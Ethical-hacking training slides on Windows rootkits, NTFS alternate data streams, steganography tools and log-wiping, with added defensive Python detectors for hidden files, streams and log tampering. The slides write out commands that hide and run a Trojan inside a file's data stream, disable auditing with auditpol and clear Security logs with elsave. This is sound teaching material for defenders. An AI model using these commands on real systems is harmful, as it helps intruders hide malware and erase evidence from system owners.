© The NT/2000 rootkit is built as a kernel mode driver which can be dynamically loaded at run time.

© The NT/2000 rootkit runs with system privileges, right at the core of the NT kernel, so it has access to all the resources of the operating system.

© The rootkit can also:

hide processes (that is, keep them from being listed)
hide files
hide registry entries
intercept keystrokes typed at the system console
issue a debug interrupt, causing a blue screen of death
redirect EXE files
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Planting the NT/2000 Rootkit

© The rootkit contains a kernel mode device driver, called _root_.sys, and a launcher program, called deploy.exe.

© After gaining access to the target system, the attacker will copy _root_.sys and deploy.exe onto the target system and execute deploy.exe.

© This will install the rootkit device driver and start it up. The attacker later deletes deploy.exe from the target machine.
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© The attacker can then stop and restart the rootkit at will by using the commands net stop _root_ and net start _root_.

© Once the rootkit is started, the file _root_.sys stops appearing in the directory listings. The rootkit intercepts the system calls for listing files and hides all files beginning with _root_ from display.
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Rootkit - Screenshot 



Once the rootkit is started, the file _root_.sys stops appearing in directory listings. The rootkit intercepts the system calls for listing files and hides all files beginning with _root_ from display.

Here is a directory listing from a system, taken before and after the attacker activated the rootkit:

Before

C:\>dir
 Volume in drive C has no label.
 Volume Serial Number is 6C15-8AC3

 Directory of C:\

02/09/2001  05:06p      <DIR>          asf
01/05/2001  11:12a      <DIR>          CAConfig
01/05/2001  11:11a      <DIR>          Documents and Settings
01/04/2001  08:06p      <DIR>          Inetpub
01/04/2001  08:08p      <DIR>          Program Files
02/10/2001  04:51p      <DIR>          rootkit
02/09/2001  03:35p      <DIR>          software
02/10/2001  05:38p      <DIR>          WINNT
02/10/2001  11:33a              57,684 _root_.sys
12/06/1999  09:00p             236,304 _root_cmd.exe
09/02/1999  01:07a              59,392 _root_nc.exe
               3 File(s)        353,380 bytes
               8 Dir(s)   6,115,020,800 bytes free
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After

 Volume in drive C has no label.
 Volume Serial Number is 6C15-8AC3

 Directory of C:\

02/09/2001  05:06p      <DIR>          asf
01/05/2001  11:12a      <DIR>          CAConfig
01/05/2001  11:11a      <DIR>          Documents and Settings
01/04/2001  08:06p      <DIR>          Inetpub
01/04/2001  08:08p      <DIR>          Program Files
02/10/2001  04:51p      <DIR>          rootkit
02/09/2001  03:35p      <DIR>          software
02/10/2001  05:38p      <DIR>          WINNT
               0 File(s)              0 bytes
               8 Dir(s)   6,115,020,800 bytes free
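The before/after listings above are exactly what a cross-view check compares. The following added Python example (not from the courseware) parses two dir listings, one taken with the rootkit running and one from a trusted view such as an alternate-OS boot or trusted restoration media, and reports the entries the live view hides. Both listings are constructed to mirror the page's screenshots; the parsing regex assumes the Windows 2000 dir format shown there.

```python
"""Cross-view detection of files hidden by a rootkit.

Added example, not part of the courseware. A rootkit that filters the live
directory listing cannot filter a listing taken without it: from an
alternate-OS boot, trusted media, or a raw read of the volume. Comparing
the two views exposes what was hidden. The two listings below are
constructed to mirror the before/after "dir" output on the page.
"""
import re

# Constructed: listing taken from a trusted view (rootkit not running).
TRUSTED_LISTING = """\
 Volume in drive C has no label.
 Volume Serial Number is 6C15-8AC3

 Directory of C:\\

02/09/2001  05:06p      <DIR>          asf
01/05/2001  11:12a      <DIR>          CAConfig
01/05/2001  11:11a      <DIR>          Documents and Settings
01/04/2001  08:06p      <DIR>          Inetpub
01/04/2001  08:08p      <DIR>          Program Files
02/10/2001  04:51p      <DIR>          rootkit
02/09/2001  03:35p      <DIR>          software
02/10/2001  05:38p      <DIR>          WINNT
02/10/2001  11:33a              57,684 _root_.sys
12/06/1999  09:00p             236,304 _root_cmd.exe
09/02/1999  01:07a              59,392 _root_nc.exe
               3 File(s)        353,380 bytes
               8 Dir(s)   6,115,020,800 bytes free
"""

# Constructed: the same directory as the live, hooked system reports it.
LIVE_LISTING = """\
 Volume in drive C has no label.
 Volume Serial Number is 6C15-8AC3

 Directory of C:\\

02/09/2001  05:06p      <DIR>          asf
01/05/2001  11:12a      <DIR>          CAConfig
01/05/2001  11:11a      <DIR>          Documents and Settings
01/04/2001  08:06p      <DIR>          Inetpub
01/04/2001  08:08p      <DIR>          Program Files
02/10/2001  04:51p      <DIR>          rootkit
02/09/2001  03:35p      <DIR>          software
02/10/2001  05:38p      <DIR>          WINNT
               0 File(s)              0 bytes
               8 Dir(s)   6,115,020,800 bytes free
"""

# One entry line of Windows 2000 "dir": date, time, <DIR> or size, name.
ENTRY_RE = re.compile(
    r"^(?P<date>\d{2}/\d{2}/\d{4})\s+(?P<time>\d{2}:\d{2}[ap])\s+"
    r"(?P<size><DIR>|[\d,]+)\s+(?P<name>.+?)\s*$"
)


def parse_dir(listing):
    """Map each entry name to its size in bytes (None for directories)."""
    entries = {}
    for line in listing.splitlines():
        m = ENTRY_RE.match(line)
        if m:
            size = None if m["size"] == "<DIR>" else int(m["size"].replace(",", ""))
            entries[m["name"]] = size
    return entries


def hidden_entries(trusted, live):
    """Names present in the trusted view but absent from the live view."""
    t, l = parse_dir(trusted), parse_dir(live)
    return sorted(name for name in t if name not in l)


def hidden_bytes(trusted, live):
    """Total size of hidden files; matches the gap between the summary lines."""
    t = parse_dir(trusted)
    return sum(t[n] or 0 for n in hidden_entries(trusted, live))


if __name__ == "__main__":
    for name in hidden_entries(TRUSTED_LISTING, LIVE_LISTING):
        print("hidden from live listing:", name)
    print("hidden bytes:", hidden_bytes(TRUSTED_LISTING, LIVE_LISTING))
```

The same comparison generalises to process lists (task list from inside the OS versus a kernel-memory walk) and registry keys, which is how Patchfinder-style tools and later rootkit detectors work; the only requirement is that one of the two views is produced by code the rootkit has not hooked.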
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Rootkit: Fu 



© It operates using Direct Kernel Object Manipulation

© It comes with two components - the dropper (fu.exe), and the driver (msdirectx.sys)

© It can:

• Hide processes and drivers

• List processes and drivers that were hidden using hooking techniques

• Add privileges to any process token

• Make actions in the Windows Event Viewer appear as someone else's actions
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Rootkit: Vanquish

© It is a DLL injection-based, WinAPI hooking rootkit

© It hides files, folders, registry entries, and logs passwords

© In case of registry hiding, Vanquish uses an advanced system to keep track of enumerated keys/values and hides the ones that need to be hidden

© For DLL injection, the target process is first written with the string 'VANQUISH.DLL' (VirtualAllocEx, WriteProcessMemory) and then CreateRemoteThread is used

© For API hooking, Vanquish uses various programming tricks
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Rootkit Counter measures 



© Back up critical data and reinstall OS/applications from a trusted source

© Don't rely on backups, as there is a chance of restoring from trojaned software

© Keep a well-documented automated installation procedure

© Keep availability of trusted restoration media

(Screenshot: AFX Windows Rootkit 2003 configuration, with tabs for Processes, Files, Registry and Connections listing the names to hide, e.g. lithium.exe, sub7.exe, bionet.exe, sdbot.exe; Generate, Help and About buttons; http://www.iamaphex.cjb.net, http://www.megasecurity.org)

Patchfinder 2.0

© Patchfinder (PF) is a sophisticated diagnostic utility designed to detect system libraries and kernel compromises

© Its primary use is to check if the given machine has been attacked with some modern rootkits like Hacker Defender, AFX, Vanquish, He4Hook, etc.
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Creati ng Alternate Data Streams 



© Start by going to the command line and typing notepad test.txt.

© Put some data in the file, save the file, and close Notepad.

© From the command line, type dir test.txt and note the file size.

© Next, go to the command line and type notepad test.txt:hidden.txt. Type some text into Notepad, save the file, and close.

© Check the file size again and notice that it hasn't changed!

© On opening test.txt, only the original data will be seen.

© On using the type command with the filename from the command line, only the original data is displayed.

© On typing type test.txt:hidden.txt, a syntax error message is displayed.
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H ow to Create NTFS Streams? 



Notepad is a streams-compliant application:

1. Launch c:\>notepad myfile.txt:lion.txt. Click 'yes' to create the new file and type 10 lines of data. Save the file.

2. Launch c:\>notepad myfile.txt:tiger.txt. Click 'yes' to create the new file and type another 20 lines of text. Save the file.

3. View the file size of myfile.txt (it should be zero).

4. To modify the stream data, open the document 'myfile.txt:tiger.txt' in Notepad.
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NTFS stream Manipulation 




Trojan.exe (Size: 2 MB)

To move the contents of Trojan.exe to Readme.txt (stream):
c:\> type c:\Trojan.exe > c:\Readme.txt:Trojan.exe

Location c:\

Readme.txt (Size 0)

To execute the Trojan.exe inside the Readme.txt (stream):
c:\> start c:\Readme.txt:Trojan.exe

To extract the Trojan.exe from the Readme.txt (stream):
c:\> cat c:\Readme.txt:Trojan.exe > Trojan.exe

Note: cat is a Windows 2000 Resource Kit utility
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Tools: Makestrm.exe 



makestrm.exe moves the physical contents of a file to its stream.

DiamondCS MakeStream Demo - http://www.diamondcs.com.au
x.org successfully converted to x.org:StreamTest

© ads_cat from Packet Storm is a utility for writing to NTFS's Alternate File Streams and includes ads_extract, ads_cp, and ads_rm, utilities to read, copy, and remove data from NTFS alternate file streams.

© Mark Russinovich at www.sysinternals.com has released the freeware utility Streams, which displays NTFS files that have alternate stream content.

© Heysoft has released LADS (List Alternate Data Streams), which scans the entire drive or a given directory. It lists the names and sizes of all alternate data streams it finds.
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© Deleting a stream file involves copying the front file to a FAT partition, then copying back to NTFS.

© Streams are lost when the file is moved to a FAT partition.

© LNS.exe from (http://ntsecurity.nu/cgi-bin/download/lns.exe.pl) can detect streams.
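The stream creation walked through in the slides above and the detection that tools like Streams, LADS and LNS perform, as an added Python example that is not from the courseware or from any of those tools. On Windows it creates test.txt:hidden.txt and shows that the visible size does not change; on any platform it scans a constructed 'dir /r' listing (a switch that exists from Windows Vista on, not on the Windows 2000 systems discussed here) for alternate streams, ignores the Zone.Identifier stream that Windows itself attaches to downloaded files, and ranks the large ones first. The listing format, file names and sizes are assumptions made for the example.

```python
"""Alternate Data Stream (ADS) demo and detector.

Added example, not part of the courseware or any tool it names. Two parts:
  * demo_stream(): on Windows/NTFS, writes a hidden stream next to a file
    and shows that the file's reported size does not change. Elsewhere it
    returns None (on other file systems ':' is an ordinary name character).
  * find_alternate_streams(): scans a 'dir /r' listing (Windows Vista and
    later) for files carrying non-default streams. The sample listing is
    constructed; the assumed format is one ':$DATA' line per stream,
    indented under its file and carrying no date/time.
"""
import os
import re
import sys
import tempfile


def demo_stream(base_name="test.txt", stream="hidden.txt"):
    """Create test.txt:hidden.txt and report sizes and the hidden text."""
    if sys.platform != "win32":
        return None
    with tempfile.TemporaryDirectory() as d:
        path = os.path.join(d, base_name)
        with open(path, "w") as f:
            f.write("visible data\n")
        before = os.path.getsize(path)
        with open(f"{path}:{stream}", "w") as f:      # the hidden stream
            f.write("secret data\n")
        after = os.path.getsize(path)                 # unchanged
        with open(f"{path}:{stream}") as f:
            return {"size_before": before, "size_after": after, "hidden": f.read()}


# Constructed 'dir /r' output: ADS lines carry no date/time and end in :$DATA.
SAMPLE_DIR_R = """\
 Directory of C:\\ads

02/10/2001  05:36 PM                13 test.txt
                                    12 test.txt:hidden.txt:$DATA
02/10/2001  05:37 PM                 0 Readme.txt
                             2,097,152 Readme.txt:Trojan.exe:$DATA
02/10/2001  05:40 PM            48,211 setup.exe
                                    26 setup.exe:Zone.Identifier:$DATA
02/10/2001  05:30 PM               128 notes.txt
               4 File(s)         48,352 bytes
"""

ADS_RE = re.compile(r"^\s+(?P<size>[\d,]+)\s+(?P<file>.+?):(?P<stream>[^:]+):\$DATA\s*$")

# Streams Windows itself attaches to downloaded files; not hiding evidence.
BENIGN_STREAMS = {"Zone.Identifier"}


def find_alternate_streams(listing, ignore=BENIGN_STREAMS):
    """Return (file, stream, size) for every non-benign alternate stream."""
    found = []
    for line in listing.splitlines():
        m = ADS_RE.match(line)
        if m and m["stream"] not in ignore:
            found.append((m["file"], m["stream"], int(m["size"].replace(",", ""))))
    return found


def suspicious_streams(listing, min_size=1024):
    """Large streams first: a program parked behind a text file is megabytes,
    while legitimate metadata streams are a few dozen bytes."""
    return [hit for hit in find_alternate_streams(listing) if hit[2] >= min_size]


if __name__ == "__main__":
    print(demo_stream())
    for f, s, n in find_alternate_streams(SAMPLE_DIR_R):
        print(f"{f} carries stream {s} ({n:,} bytes)")
```

The same scan is the practical answer to the slide's "copy to FAT and back" removal advice: list the streams first, decide which are legitimate, and only then strip the file, since copying blindly also discards metadata that applications may rely on.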
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What is Steganography? 



© The process of hiding data in images is called Steganography.

© The most popular method for hiding data in files is to utilize graphic images as hiding places.

© Attackers can embed information such as:

• Source code for hacking tool

• List of compromised servers

• Plans for future attacks

• Grandma's secret cookie recipe

(Figure: Steganography - a cover image.)
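How hidden data can ride inside an image without changing its size, as an added Python example that is not from the courseware or from any tool it names: least-significant-bit embedding on a constructed 8-bit grayscale buffer, with extraction and a first-pass statistic a defender can compute. The cover, the message and the buffer dimensions are constructed; a real tool applies the same bit operations to the pixel bytes of a decoded bitmap.

```python
"""Least-significant-bit steganography on a raw 8-bit pixel buffer.

Added example, not part of the courseware. The cover is a constructed
grayscale gradient rather than a decoded image file so the code runs
offline. It shows why the file size does not grow (every pixel keeps its
size; only its lowest bit changes) and gives a first-pass statistic,
the share of 1-valued LSBs, that a defender can compute over a file.
"""
import struct


def make_cover(width=64, height=16):
    """Constructed cover: a smooth gradient using even values only."""
    return bytes(((x * 255 // (width - 1)) & 0xFE)
                 for _ in range(height) for x in range(width))


def capacity(cover):
    """Bytes of payload a cover can hold after the 4-byte length header."""
    return len(cover) // 8 - 4


def embed(cover, message):
    """Write len(message) as a 4-byte big-endian header, then the message,
    one bit per pixel into the pixels' least-significant bits."""
    if len(message) > capacity(cover):
        raise ValueError(f"cover holds {capacity(cover)} bytes, message is {len(message)}")
    payload = struct.pack(">I", len(message)) + message
    out = bytearray(cover)
    i = 0
    for byte in payload:
        for shift in range(7, -1, -1):
            out[i] = (out[i] & 0xFE) | ((byte >> shift) & 1)
            i += 1
    return bytes(out)


def _read_bytes(stego, start_pixel, count):
    """Reassemble count bytes from the LSBs starting at start_pixel."""
    data = bytearray()
    i = start_pixel
    for _ in range(count):
        value = 0
        for _ in range(8):
            value = (value << 1) | (stego[i] & 1)
            i += 1
        data.append(value)
    return bytes(data)


def extract(stego):
    """Recover the message written by embed()."""
    (length,) = struct.unpack(">I", _read_bytes(stego, 0, 4))
    return _read_bytes(stego, 32, length)


def lsb_ones_ratio(pixels):
    """Fraction of pixels whose LSB is 1. The constructed cover gives 0.0;
    real photographs already sit near 0.5, which is why practical
    detection looks at pair-of-values statistics rather than this ratio."""
    return sum(p & 1 for p in pixels) / len(pixels)


if __name__ == "__main__":
    cover = make_cover()
    secret = b"Grandma's secret cookie recipe"
    stego = embed(cover, secret)
    print(len(cover), len(stego), extract(stego))
    print(f"LSB ones ratio: cover={lsb_ones_ratio(cover):.3f} "
          f"stego={lsb_ones_ratio(stego):.3f}")
```

Two consequences for a defender follow directly from the code: the carrier's size and visible appearance are useless as indicators (each pixel moves by at most one level), and the payload survives only lossless formats, so recompressing images at a mail gateway destroys it while leaving the picture intact.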
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Tool : M erge Streams 



© This utility enables you to merge MS Word streams and MS Excel Workbook streams.

© It can hide MS Excel Workbooks within MS Word Documents or vice versa.

(Screenshot: Glue - NT Kernel Resources, www.ntkernel.com: MS Word C:\Documents and Settings\Desktop\test.doc, MS Excel G:\test.xls, with Browse, Merge, Cancel and About buttons.)
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Invisi ble Folders 



© Hide any folder or a group of folders on your system by pressing a simple hotkey combination.

© The selected folders will remain invisible until you decide to make them visible again using your hotkey combinations.

© You can also password protect your hotkey combinations.

(Screenshot: Invisible Folders, with an Invisible Folder List containing E:\Downloads and the buttons Add to List, Remove From List, Remove All, Activate Invisible, Activate Visible, Purchase, Options and Exit. "Drag and Drop folders into the area above or simply click 'Add to List' and select them from the Explorer menu.")
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Tool: Invisible Secrets 4

A security suite that helps you to hide files, encrypt files, destroy your Internet traces, shred files, make secure IP to IP password transfers, and even lock any application on your computer.

(Screenshot: Invisible Secrets 4 main menu: Encrypt Files, Decrypt Files, Open Cryptboard, Shred Files, Destroy Internet Traces, IP-to-IP Secure Password Transfer, Self-Decrypting Package, Locked Applications, Locker Settings; with Passwords, Options and Help buttons and a link "Read about the 'carrier' concept".)
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Tool: Image Hide

© Image Hide is a steganography program which hides loads of text in images.

© Does simple encryption and decryption of data.

© Even after adding bytes of data, there will not be any increase in image size.

© Image looks the same to normal paint packages.

© Loads and saves to files and gets past all the mail sniffers.

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(Screenshot: Image Hide - Dancemammal.com, with a File Edit Image Tools Window menu bar and an "Avoid saving files" option; Copyright (c) 2001 Dancemammal.)
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Tool: Camera/Shy

© Camera/Shy works with Windows and Internet Explorer and lets users share censored or sensitive information buried within an ordinary GIF image.

© The program lets users encrypt text with a click of the mouse and bury the text in an image. The files can be password protected for further security.

© Viewers who open the pages with the Camera/Shy browser tool can then decrypt the embedded text on the fly by double-clicking on the image and supplying a password.
Camera/Shy - Screenshot

[Screenshots: the Camera/Shy browser (menus Utilities, View, Security, Help, Dedication) loaded on "Welcome to JuggyBoy.com". The status bar reports "Encrypted GIF Images in Webpage, Click to Load" for http://www.juggyboy.com/images/jugggyboy.gif, then "Camera/Shy Mode" and "GIF's Scanned: 7".]
www.spammimic.com

[Screenshot: a browser open at http://www.spammimic.com/encode.cgi.]

Spammimic hides a short message inside text that reads like ordinary junk mail. The encoder is a grammar-based mimic function: each choice between alternative spam phrases carries bits of the message, so the output survives being read by a human who dismisses it as spam.

Encoded: your message "Mona lisa" gets encoded into spam as:

  Dear Friend , This letter was specially selected to
  be sent to you ! We will comply with all removal requests
  This mail is being sent in compliance with Senate
  bill 1622 ; Title 5 , Section 305 ! This is NOT unsolicited
  bulk mail ! Why work for somebody else when you can
  become rich in 38 days ! Have you ever noticed people
  are much more likely to BUY with a credit card than
  cash and more people than ever are surfing the web
  Well, now is your chance to capitalize on this !
  WE will help YOU use credit cards on your website and
  SELL MORE ! You are guaranteed to succeed because we
  take all the risk . But don't believe us . Mr Jimes
  of Colorado tried us and says "Now I'm rich, Rich,
  RICH" ! We are licensed to operate in all states .
  If not for you then for your LOVED ONES - act now !
  Sign up a friend and you'll get a discount of 60% !
  Best regards !

Encoded message: "Zap this message into your mailer (...but it won't be sent until you click on Send)", or copy the message out of the text box and paste it into a mail.

Decoded: your spam message "Dear Friend , This letter was specially ..." decodes to the original text.

Copyright © 2000-2005 spammimic.com. All rights reserved.
Tool: MP3Stego

• Source: http://www.techtv.com
• MP3Stego hides information in MP3 files during the compression process.
• The data is first compressed, encrypted, and then hidden in the MP3 bit stream. Because the bits ride on the encoder's own coding decisions, the message does not survive re-encoding the MP3, and a file produced from a known WAV can be compared against a clean encode of the same WAV.

  C:\Development\MP3Stego>encode -E hidden_text.txt -P pass svega.wav svega_stego.mp3
  MP3StegoEncoder 1.1.15
  See README file for copyright info
  Microsoft RIFF, WAVE audio, PCM, mono 44100Hz 16bit, Length: 0: 0:20
  MPEG-I layer III, mono  Psychoacoustic Model: AT&T
  Bitrate=128 kbps  De-emphasis: none  CRC: off
  Encoding "svega.wav" to "svega_stego.mp3"
  Hiding "hidden_text.txt"
  [Frame 791 of 791] (100.00%) Finished in 0: 0: 6

  C:\Development\MP3Stego>decode -X -P pass svega_stego.mp3
  MP3StegoEncoder 1.1.15
  See README file for copyright info
  Input file = 'svega_stego.mp3'  output file = 'svega_stego.mp3.pcm'
  Will attempt to extract hidden information. Output: svega_stego.mp3.txt
  The bit stream file svega_stego.mp3 is a BINARY file
  HDR: s=FFF, id=1, l=3, ep=off, br=9, sf=0, pd=1, pr=0, m=3, js=0, c=0, o=0, e=0
  alg.=MPEG-1, layer=III, tot bitrate=128, sfrq=44.1
  mode=single-ch, sblim=32, jsbd=32, ch=1
  [Frame 791] Avg slots/frame = 417.434; b/smp = 2.90; br = 127.839 kbps
  Decoding of "svega_stego.mp3" is finished
  The decoded PCM output file name is "svega_stego.mp3.pcm"

  C:\Development\MP3Stego>_
Tool: Snow.exe

• Snow is a whitespace steganography program used to conceal messages in ASCII text by appending whitespace to the end of lines.
• Because spaces and tabs are generally not visible in text viewers, the message is effectively hidden from casual observers. It is not hidden from tools: any editor set to show whitespace, or a script that counts trailing tabs and spaces, exposes the carrier.
• If the built-in encryption is used, the message cannot be read without the password even if its presence is detected.

To encode the message into myfile.doc, writing the result to myfile2.doc:

  snow -m "Swiss bank a/c: 3453434" -p "password-123" myfile.doc myfile2.doc

To extract the message, the command would be:

  snow -p "password-123" myfile2.doc
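The following is an added example, not code from the course or from snow itself: a simplified whitespace-steganography scheme in snow's style (a trailing space per 0 bit, a trailing tab per 1 bit, spread over the cover's lines) together with the detector's view of the result. It is NOT snow's real format (snow also compresses the message and encrypts it with ICE), and the cover text and secret are constructed.

```python
# Whitespace steganography, added example in the style of snow: each bit of the
# message becomes a trailing space (0) or tab (1) on a line of the cover text,
# and a detector counts trailing whitespace. Simplified scheme written for this
# page, NOT snow's real file format (no compression, no ICE encryption).
# All inputs below are constructed.

COVER_TEXT = """Quarterly report
All figures are preliminary.
Contact the finance desk for questions.
Thanks for reading.
"""


def _to_bits(data: bytes) -> list:
    return [(byte >> i) & 1 for byte in data for i in range(7, -1, -1)]


def _from_bits(bits: list) -> bytes:
    usable = len(bits) - len(bits) % 8
    return bytes(int("".join(map(str, bits[i:i + 8])), 2) for i in range(0, usable, 8))


def encode(cover: str, message: bytes) -> str:
    """Spread the bits of (2-byte length prefix + message) evenly over the
    cover's lines as trailing whitespace. Any existing trailing whitespace
    is dropped so the decoder sees only our bits."""
    bits = _to_bits(len(message).to_bytes(2, "big") + message)
    lines = cover.split("\n")
    per_line = -(-len(bits) // len(lines))           # ceiling division
    out = []
    for idx, line in enumerate(lines):
        chunk = bits[idx * per_line:(idx + 1) * per_line]
        out.append(line.rstrip(" \t") + "".join("\t" if b else " " for b in chunk))
    return "\n".join(out)


def decode(stego: str) -> bytes:
    """Read trailing whitespace in line order; return the message, or b""
    when the text carries no length prefix."""
    bits = []
    for line in stego.split("\n"):
        visible = line.rstrip(" \t")
        bits.extend(1 if ch == "\t" else 0 for ch in line[len(visible):])
    raw = _from_bits(bits)
    if len(raw) < 2:
        return b""
    length = int.from_bytes(raw[:2], "big")
    return raw[2:2 + length]


def trailing_whitespace_report(text: str) -> dict:
    """The detector's view: how many lines end in whitespace and how many
    mix spaces and tabs, which ordinary text almost never does."""
    lines = text.split("\n")
    trailing = [ln[len(ln.rstrip(" \t")):] for ln in lines]
    return {
        "lines": len(lines),
        "trailing": sum(1 for t in trailing if t),
        "mixed_space_tab": sum(1 for t in trailing if " " in t and "\t" in t),
    }


if __name__ == "__main__":
    secret = b"Swiss bank a/c: 3453434"
    stego = encode(COVER_TEXT, secret)
    print(decode(stego))
    print(trailing_whitespace_report(COVER_TEXT), trailing_whitespace_report(stego))
```

The visible text is unchanged, which is the whole point of the technique; the report, however, shows every line of the stego file ending in a run of mixed spaces and tabs while the cover has none. That is the check to run on inbound text if whitespace carriers are a concern.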
Steganography Detection

• Stegdetect is an automated tool for detecting steganographic content in images.
• It is capable of detecting several steganographic methods used to embed hidden information in JPEG images, including jsteg, jphide, invisible secrets and outguess. Its tests are statistical, so they produce false positives; the sensitivity setting (-s) trades detection rate against false alarms.
• Stegbreak is used to launch dictionary attacks against JSteg-Shell, JPHide, and OutGuess 0.13b.
Stegdetect Screenshot

[Screenshot: xsteg, the GUI front end to stegdetect. Menus File, Options, Help. Scan options: jsteg, jphide, outguess, invisible; Sensitivity 1.00; Stop button. Result table: Filename "E:\CHFI Project\CHFI V2\CHFI V2 Tools\Module 17 - Stegan..." Detection "negative". Message window: "Starting stegdetect with -tjpoi -s1.000".]
Tool: dskprobe.exe

• Run a low-level hard disk scanner to detect steganographic content
  • e.g. dskprobe.exe can search the hard disk sectors for file contents
• Dskprobe can be found on the Windows 2000 installation CD-ROM under the Support directory
• Steps to search for file contents:
  • Launch dskprobe and open the physical drive to read
  • Click the Set Active button adjacent to the drive after it populates the handle '0'
  • Click Tools -> Search Sectors and search for the string efs0.tmp (from sector 0 to the end of the disk)
  • Exhaustive Search should be selected, and Case and Unicode characters should be ignored
System Hacking: Part V

Covering Tracks

CEH Hacking Cycle: Cracking passwords -> Escalating privileges -> Covering tracks

• Once intruders have successfully gained Administrator access on a system, they will try to cover the detection of their presence.
• When all the information of interest has been stripped off from the target, the intruder installs several back doors so that easy access can be obtained in the future.
Disabling Auditing

• The first thing intruders will do after gaining Administrator privileges is to disable auditing.
• The NT Resource Kit's auditpol.exe tool can disable auditing from the command line.
• At the end of their stay, the intruders will just turn auditing on again using auditpol.exe.
• The toggling itself is recorded as an audit policy change (Event ID 612 on Windows NT/2000/2003, 4719 on later versions) unless the log is cleared as well, so two policy-change events bracketing a quiet period are a useful indicator.

  C:\> auditpol.exe /disable
  Running ...

  Local audit information changed successfully.
  New local audit policy ...

  (0) Audit Disabled

  AuditCategorySystem       = No
  AuditCategoryLogon        = Failure
  AuditCategoryObjectAccess = No

  C:\> auditpol.exe /enable

  Auditing enabled successfully.

EC-Council. Copyright © by EC-Council. All Rights reserved. Reproduction is strictly prohibited.
Clearing the Event Log

• Intruders can easily wipe out the logs in the Event Viewer.
• This process clears all records from the log but leaves one record stating that the event log has been cleared by "Attacker" (the account that performed the clearing). That single record (Event ID 517 on Windows NT/2000/2003, 1102 on later versions) is itself a strong indicator.

[Screenshot: Windows Event Viewer after the Security log has been cleared, with the Filter dialog showing the Event types options.]
Tool: elsave.exe

• elsave.exe is a simple tool for saving and clearing the event log.
• The following syntax will clear the Security log on the remote server 'rovil' (correct privileges are required on the remote system):

  c:\> elsave -s \\rovil -l "Security" -C

• Save the System log on the local machine to d:\system.log and then clear the log:

  elsave -l system -F d:\system.log -C

• Save the Application log on \\serv1 to \\serv1\d$\application.log (no -l is given, so the tool's default log is used, and the -F path is interpreted on the remote machine):

  elsave -s \\serv1 -F d:\application.log
Hacking Tool: Winzapper

• Winzapper is a tool that an attacker can use to erase event records selectively from the Security log in Windows 2000.
• To use the program, the attacker runs winzapper.exe and marks the event records to be deleted, then presses "Delete Events and Exit".
• Unlike clearing the whole log, selective deletion leaves no "log cleared" record behind. The only reliable defence is to forward events to a separate collector as they are written, so that the copy the attacker can edit is not the only one.
• To sum things up: after an attacker has gained Administrator access to the system, one simply cannot trust the local Security log.
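The four "covering tracks" slides above (auditpol, clearing the log, elsave, Winzapper) each leave something behind in the log that survives. The following is an added example, not from the course: it walks a constructed Security log export and flags the log-cleared event, audit-policy changes such as the auditpol /disable and /enable pair, gaps in record numbers (which selective deletion leaves behind) and timestamps that run backwards. The records, account names and times are constructed; the event IDs are the real ones (517/612 on Windows NT/2000/XP/2003, 1102/4719 on Vista and later).

```python
# Spotting the "covering tracks" steps in a Security log export. Added example,
# not from the course: flags (a) the log-cleared event, (b) audit-policy
# changes, (c) gaps in record numbers left by selective deletion, and (d)
# timestamps that run backwards. Windows event record numbers are assigned
# sequentially, so a gap means records were removed, not rotated.
from datetime import datetime

LOG_CLEARED = {517: "NT/2000/XP/2003", 1102: "Vista and later"}
POLICY_CHANGED = {612: "NT/2000/XP/2003", 4719: "Vista and later"}

# Constructed sample (not a real export). Record 1041 is missing on purpose;
# 528 = successful logon, 576 = special privileges assigned.
SAMPLE_EVENTS = [
    {"record": 1038, "time": "2005-03-01 09:58:02", "event_id": 528, "user": "jdoe"},
    {"record": 1039, "time": "2005-03-01 10:01:44", "event_id": 576, "user": "jdoe"},
    {"record": 1040, "time": "2005-03-01 10:02:11", "event_id": 612, "user": "Administrator"},
    {"record": 1042, "time": "2005-03-01 10:19:37", "event_id": 528, "user": "Administrator"},
    {"record": 1043, "time": "2005-03-01 10:20:05", "event_id": 612, "user": "Administrator"},
    {"record": 1044, "time": "2005-03-01 10:20:09", "event_id": 517, "user": "Administrator"},
]


def find_tampering(events: list) -> list:
    """Return (kind, record_number, detail) tuples in record order."""
    findings = []
    prev_record = prev_time = None
    for ev in sorted(events, key=lambda e: e["record"]):
        when = datetime.strptime(ev["time"], "%Y-%m-%d %H:%M:%S")
        eid, rec = ev["event_id"], ev["record"]
        if eid in LOG_CLEARED:
            findings.append(("log_cleared", rec,
                             f"by {ev['user']} (event {eid}, {LOG_CLEARED[eid]})"))
        if eid in POLICY_CHANGED:
            findings.append(("audit_policy_changed", rec,
                             f"by {ev['user']} (event {eid}, {POLICY_CHANGED[eid]})"))
        if prev_record is not None and rec != prev_record + 1:
            findings.append(("record_gap", rec,
                             f"{rec - prev_record - 1} record(s) missing before this one"))
        if prev_time is not None and when < prev_time:
            findings.append(("time_regression", rec,
                             f"written at {when}, earlier than record {prev_record}"))
        prev_record, prev_time = rec, when
    return findings


def quiet_windows(findings: list) -> list:
    """Consecutive pairs of audit-policy changes: the span between each pair
    is where auditing was most likely switched off (auditpol /disable ...
    /enable), so anything that happened then is simply not in the log."""
    changes = [rec for kind, rec, _ in findings if kind == "audit_policy_changed"]
    return list(zip(changes, changes[1:]))


if __name__ == "__main__":
    for finding in find_tampering(SAMPLE_EVENTS):
        print(finding)
    print(quiet_windows(find_tampering(SAMPLE_EVENTS)))
```

On the sample this reports a policy change at record 1040, a gap before 1042, a second policy change at 1043 and the log-cleared event at 1044, and pairs 1040 with 1043 as the quiet window. The record-gap heuristic assumes the export is complete; apply it to the whole log, not to a filtered view.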
Tool: Traceless

• Clears your Internet settings.
• You can stop your home page from being written over by uninvited websites.

[Screenshot: Traceless 1.16. Copyright © 2003-2005 Vantarakis Software. All rights reserved.]
Tool: Tracks Eraser Pro

• Designed to protect you by cleaning up all the unwanted history data on your computer.
• Allows you to erase the cache, cookies, history, typed URLs, auto-complete memory and index.dat from your browsers, and Windows' temp folder, run history, search history, open/save history, recent documents, etc.

[Screenshot: Tracks Eraser Pro (Unregistered), "Cover Your Tracks". Task list with status: IE Address Bar, IE Cookies, IE Cache, IE History, IE AutoComplete Forms and Passwords, IE Plugins. Buttons: Erase Now, Test Now, Eraser Settings, Options, File Shredder, Log, About, Help, Exit; "Last Erased at" status line.]
Tool: ZeroTracks

• Allows the user to clear paging files, recent documents, recycle bin, temp files, and the run list in the Start menu.
• You can also clear the Internet cache, temporary Internet files, cookies and autocompletes.

